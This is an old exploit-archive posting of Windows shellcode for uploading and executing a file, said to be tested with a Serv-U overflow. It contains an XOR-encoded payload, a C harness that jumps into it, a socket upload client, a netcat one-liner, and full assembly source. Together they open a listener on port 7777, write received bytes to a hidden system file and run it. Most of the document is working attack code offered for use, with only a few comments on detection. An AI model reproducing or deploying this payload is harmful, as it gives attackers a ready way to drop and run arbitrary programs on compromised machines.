Uploading shellcode v0.2 with mtdm serv-u overflow
来源:www.delikon.de 作者:vfocus 发布时间:2004-05-14  

/*
Uploading and executing shellcode v0.2 | www.delikon.de | 2.5.04
I have tested this exploit with the mtdm Serv-U overflow.

thanks to
-Jarkko Turkulainen (http://www.klake.org/~jt/asmcode/)
for his shellcode encoder
-ratter for the PEB structure information.
-www.metasploit.com, from which I copied and pasted
90% of this code

For uploading a file, use the function below or netcat:

nc ip 7777 < file.exe
Strg-C (Ctrl-C)
*/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib, "ws2_32.lib")
/*
 * Encoded payload bytes. Per the author's note the bytes are XOR-0x88
 * encoded and the payload listens on TCP port 7777; the NASM source in the
 * comment block at the end of this file is presumably what they were
 * assembled from (bind/listen/accept on 7777, write the received bytes to
 * a file named "test.exe" created relative to the current directory with
 * the HIDDEN|SYSTEM attributes, WinExec() it, then ExitProcess()).
 * Detection artefacts, from that listing: a new listener on 7777 and a
 * hidden+system "test.exe" appearing in the exploited process's directory.
 */
char shellcode[] = "\xD9"//xor 0x88 | port 7777
"\xE1\xD9\x34\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x4E\xFE\x80\x30"
"\x88\x40\xE2\xFA\x61\xEC\x89\x88\x88\xD3\xDD\x01\x6D\xEE\x09\x64\xBC\x88\x01\x6E"
"\xEE\x09\x64\x84\x88\x60\x53\x88\x88\x88\x01\x4F\xDF\xE0\x06\xC6\x86\x64\x60\x6F"
"\x88\x88\x88\x01\xCD\x80\x05\xDB\xB8\xDA\x77\xDD\x80\x01\xCD\x80\x05\xDB\xB3\x01"
"\xDE\xBC\xE2\x85\xD1\xEE\x09\x71\x8F\x88\xFD\x8B\x03\xF5\x80\x01\x86\xDF\x77\xFC"
"\x03\x74\x60\x33\x88\x88\x88\x03\x86\x01\xCC\x06\x74\x6A\x6A\xEE\x09\x64\x18\x89"
"\xDC\xE0\x89\x89\x88\x88\x77\xDE\x8C\xB9\x77\xDF\xDF\xDF\xDF\xCF\xDF\xCF\xDF\x77"
"\x9E\x01\x4B\xB9\x77\xDF\xDF\xE0\x8A\x88\x96\xE9\x01\x6A\xE2\x98\xDA\xDB\x77\xDE"
"\x80\xDF\xDB\x77\xDE\x84\xDF\xDE\xDB\x77\xDE\x98\x01\x4B\xE2\x88\xE2\x8E\xE2\x8C"
"\xE2\x88\xE2\x8F\xE0\x88\x88\x88\x68\x77\xFE\xBC\x77\xDE\xAC\x01\x4F\x09\x64\x14"
"\x77\x77\x77\x01\x6D\x05\xDD\xEC\xE2\x88\xE0\xEC\x88\x88\x88\xDA\xDB\x77\xDE\x9C"
"\xB5\x77\x77\x77\x77\xFC\x9D\xB5\x88\x88\x88\x88\xFC\x86\x05\xDD\xEC\xE2\x88\xD9"
"\xD8\xDA\xDF\x77\xDE\xA0\x63\x5D\xDF\x77\xDE\xA4\xE0\x8D\x88\x88\x88\x77\xFE\xBC"
"\x77\xDE\xA8\xB9\x77\xDF\x77\xDE\x94\xDD\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8\x84"
"\x03\xF8\x94\x25\x03\xE0\x80\x01\x60\xD6\xD5\x4A\x8C\x88\xDB\xDD\xDE\xDF\x03\xE4"
"\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B"
"\xBD\xC1\x03\xBC\x03\x89\x66\xB9\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85"
"\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03"
"\xD2\x94\x89\x63\x03\x8C\x03\x89\x60\x61\x8A\x88\x88\x88\xB9\x48\x01\x62\xD7\xD6"
"\xD5\xD3\x4A\x8C\x88\x60\x1F\x76\x77\x77\x51\x81\x7D\x25\x43\x65\x74\xB3\x2C\x92"
"\xF8\x4F\x2C\x25\xA6\x61\x6D\xC1\x0E\xC1\x3E\x91\x90\x6F\x6F\xF1\x4E\xF1\xF6\x50"
"\x6A\xFB\x10\x76\x02\x86\x2D\x9F\x88\xF4\x97\xF1\x82\x60\x73\x1F\x75\x87\xDF\xDB"
"\xBA\xD7\xBB\xBA\xA6\xCC\xC4\xC4\x88\xFC\xED\xFB\xFC\xA6\xED\xF0\xED\x88";

/*
 * Entry point: initialise Winsock 2.0 and then transfer control directly
 * into the `shellcode` byte array above. Takes no arguments; the payload
 * is called with no arguments and nothing is returned.
 *
 * `(long) funct = &shellcode;` assigns through a cast used as an lvalue,
 * which is a compiler extension rather than standard C, and the result of
 * WSAStartup() is never checked. The array normally sits in a writable,
 * non-executable data section, so on a system enforcing DEP/NX the call
 * faults instead of running the payload.
 */
int
main(){
WSADATA wsa;
void (*funct) ();                         /* payload entry, called with no arguments */
(long) funct = &shellcode;                /* point the function pointer at the byte array */
WSAStartup(MAKEWORD(2,0),&wsa);           /* Winsock 2.0; return value ignored */
funct();}

/*

//you can use this function for the file upload


int fileupload(int port,char *FileName,char* ip){

FILE* file;


int sockfd, numbytes;

struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
char *a=NULL;
int read=0;


printf("[+] Opening File\n");

file = fopen(FileName,"rb");
if (file==NULL) {
printf("[-] Open Failed\n");
return -1;
}
printf("[+] File found ready to send\n");

if ((he=gethostbyname(ip)) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(port); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting error\n");
return -1;
}
printf("[+] Connected\n[+] Sending executable.\n");

while (!feof(file)) {
read = fread(buf,sizeof(char),sizeof(buf),file);
Sleep(200);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return -1;
}
printf(".");
}
printf("\n[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 0;
}


*/


/*
[BITS 32]

%define BLOCKSZ 100

jmp data


start:
pop ebx
push ebp
mov ebp,esp
sub sp,52 ;we want to save 4*13 bytes for the function addresses
mov esi,esp
sub sp,12

call LK32Base
mov edi, eax ; kernel addr in EDI


push dword edi
push 0xec0e4e8e
call LGetProcAddress
mov [ebp+8], eax ; LoadLibrary addr in ebp+8


lea edx,[ebx+48]
push edx
call [ebp+8]
mov [ebp+8],eax

lea edx,[ebx+59] ;get the file name
mov [esi+52],edx


push byte 0xd
pop ecx
kerneladdr:
cmp cx,11-4
jne here
mov edi,[ebp+8]


here:
mov [esi],ecx ;save the counter
push dword edi
push dword [ecx*4+ebx-4]
call LGetProcAddress
mov ecx,[esi] ;restore it
mov [esi+ecx*4-4],eax
loop kerneladdr

LWSAStartup:
; WSAStartup(0x101, DATA)
sub sp, 400
push esp
push 0x101
call [esi + 4]

LWSASocketA:
; WSASocketA(2,1,0,0,0,0)
xor edi,edi
push edi
push edi
push edi
push edi
inc edi
push edi
inc edi
push edi
call [esi]
mov ebx, eax ; save socket to ebx


LBind:
xor edi, edi
push edi
push edi
push dword 0x611E0002 ; port 7777
mov edx, esp
push byte 0x10 ; length
push edx
push ebx
call [esi + 8]

LListen:
push edi
push ebx
call [esi+12]

LAccept:
push edi
push esi
push ebx
call [esi + 16]
mov ebx, eax

LCreateFile:

push byte 0 ; template
push byte 6 ; FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
push byte 4 ; OPEN_ALWAYS
push byte 0 ; lpSecurityAttributes=null
push byte 7 ; FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE;
push 0xe0000000 ; GENERIC_EXECUTE | GENERIC_READ | GENERIC_WRITE
push dword [esi+52] ; file name
call [esi+36]
mov edi, eax ; Handle in edi

LConfigBuffer:

sub esp, BLOCKSZ - 200
mov ebp,esp

LReadSocket: ; recv(s, buff, 4096, 0)
lea edx, [ebp+100] ; recv buffer ptr
push byte 0x00 ; flags
push BLOCKSZ ; length
push edx ; buffer
push dword ebx ; socket
call [esi+20] ; recv()

cmp eax,0xFFFFFFFF ; disconnect ?? yes! go end
je end
cmp eax,0 ; disconnect ?? yes! go end
je end

LWriteFile:
lea edx, [ebp+100] ; recv buffer ptr
push byte 0 ; not overlapped
push ecx ; &written
push eax ; recv len
push edx ; source buffer
push edi ; file handle
call [esi+40] ; WriteFile


jmp LReadSocket ; go read some more

end:
LCloseHandle:
push edi
call [esi+44]

push 5
push dword [esi+52]
call [esi+32]

xor edi,edi
push edi
call [esi+28]

LK32Base:
push ebp
push esi

mov eax, [fs:0x30]

mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov ebp, [eax + 0x08]

mov eax, ebp
pop esi
pop ebp
ret 4

LGetProcAddress:

push ebx
push ebp
push esi
push edi

mov ebp, [esp + 24]; DLL Base Address
mov eax, [ebp + 0x3c]; eax = PE header offset
mov edx, [ebp + eax + 120]
add edx, ebp; edx = exports directory table
mov ecx, [edx + 24]; ecx = number of name pointers
mov ebx, [edx + 32]
add ebx, ebp; ebx = name pointers table

LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp; esi = name pointer
xor edi, edi
cld

LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp LHshlp

LFnd:
; compare computed hash to argument
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]; ebx = ordinals table RVA
add ebx, ebp
mov cx, [ebx + 2 * ecx]; ecx = function ordinal
mov ebx, [edx + 28]; ebx = address table RVA
add ebx, ebp
mov eax, [ebx + 4 * ecx]; eax = address of function RVA
add eax, ebp
jmp LDone

LNtfnd:
xor eax, eax

LDone:
mov edx, ebp

pop edi
pop esi
pop ebp
pop ebx
ret 4


data:

call start
;addr of kernel
dd 0xadf509d9 ;WSASocketA [esi]
dd 0x3bfcedcb ;WSAStartup 4
dd 0xc7701aa4 ;bind 8
dd 0xe92eada4 ;listen 12
dd 0x498649e5 ;accept 16
dd 0xe71819b6 ;recv 20
dd 0x79c679e7 ;closesocket 24


dd 0x73e2d87e ;ExitProcess 28
dd 0x0e8afe98 ;WinExec 32

dd 0x7c0017a5 ;CreateFileA 36
dd 0xe80a791f ;WriteFile 40
dd 0x0ffd97fb ;CloseHandle 44

db "WS2_32.DLL", 0x00
db "test.exe", 0x00


*/



 